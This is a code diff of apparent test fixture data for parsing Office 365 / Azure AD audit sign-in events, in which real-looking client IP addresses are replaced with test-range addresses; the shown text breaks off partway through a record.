@@ -2580,7 +2580,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:29:56\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"29f94716-3717-4671-962e-9c739b764f07\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"8b8e8663-8a8c-4959-a692-e3eece085300\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:29:56\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"29f94716-3717-4671-962e-9c739b764f07\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"8b8e8663-8a8c-4959-a692-e3eece085300\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2598,10 +2598,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:29:56", "ExtendedProperties": [ { 
@@ -2651,7 +2651,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:51:23\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"17d02385-1e30-45b7-949c-4d3dd549a0e7\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"361dd87e-3bc9-4f0a-b236-ed7365e28d00\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:51:23\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"17d02385-1e30-45b7-949c-4d3dd549a0e7\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"361dd87e-3bc9-4f0a-b236-ed7365e28d00\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2669,10 +2669,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:51:23", "ExtendedProperties": [ { 
@@ -2722,7 +2722,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:39:45\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"e3346dd0-ecf6-4676-8765-365c7370b6fe\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"32b4cec1-00eb-44ea-be73-adc82387db00\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:39:45\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"e3346dd0-ecf6-4676-8765-365c7370b6fe\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"32b4cec1-00eb-44ea-be73-adc82387db00\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2732,10 +2732,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T21:39:45", "ExtendedProperties": [ { 
@@ -2778,7 +2778,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:40:16\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"a772fd76-847f-4703-90f1-37eb81c9f392\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"a063e495-5883-4837-8186-582817fdd500\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:40:16\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"a772fd76-847f-4703-90f1-37eb81c9f392\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"a063e495-5883-4837-8186-582817fdd500\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2796,10 +2796,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T21:40:16", "ExtendedProperties": [ { 
@@ -2850,7 +2850,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"37.29.234.179\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"37.29.234.179\",\"CreationTime\":\"2020-02-08T14:33:52\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"487e4f43-53db-4d6f-a314-5355746d4853\",\"InterSystemsId\":\"7766ac63-ae7f-43e6-868a-a5422a96fd8b\",\"IntraSystemId\":\"adc9d69c-8ae6-41c7-b685-331453060a00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.14\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.14\",\"CreationTime\":\"2020-02-08T14:33:52\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"487e4f43-53db-4d6f-a314-5355746d4853\",\"InterSystemsId\":\"7766ac63-ae7f-43e6-868a-a5422a96fd8b\",\"IntraSystemId\":\"adc9d69c-8ae6-41c7-b685-331453060a00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2868,10 +2868,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "37.29.234.179", + "ActorIpAddress": "67.43.156.14", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "37.29.234.179", + "ClientIP": "67.43.156.14", "CreationTime": "2020-02-08T14:33:52", "ExtendedProperties": [ { 
@@ -2921,7 +2921,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:53:24\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"41f6b2dc-4db6-444c-93d9-829a842b87e2\",\"InterSystemsId\":\"781c1055-e731-48ee-a806-c3f39ba160e3\",\"IntraSystemId\":\"e7fe21ea-ec03-46dd-b272-0a72ebbeac00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:53:24\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"41f6b2dc-4db6-444c-93d9-829a842b87e2\",\"InterSystemsId\":\"781c1055-e731-48ee-a806-c3f39ba160e3\",\"IntraSystemId\":\"e7fe21ea-ec03-46dd-b272-0a72ebbeac00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2939,10 +2939,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T10:53:24", "ExtendedProperties": [ { 
@@ -2992,7 +2992,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:22\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"ec9fa29b-6201-456d-b228-ca1759e0bf6c\",\"InterSystemsId\":\"82b07417-7b33-4531-952f-d3f719e2356a\",\"IntraSystemId\":\"280b3410-9d51-4ce3-952d-5bba0bea6600\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:22\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 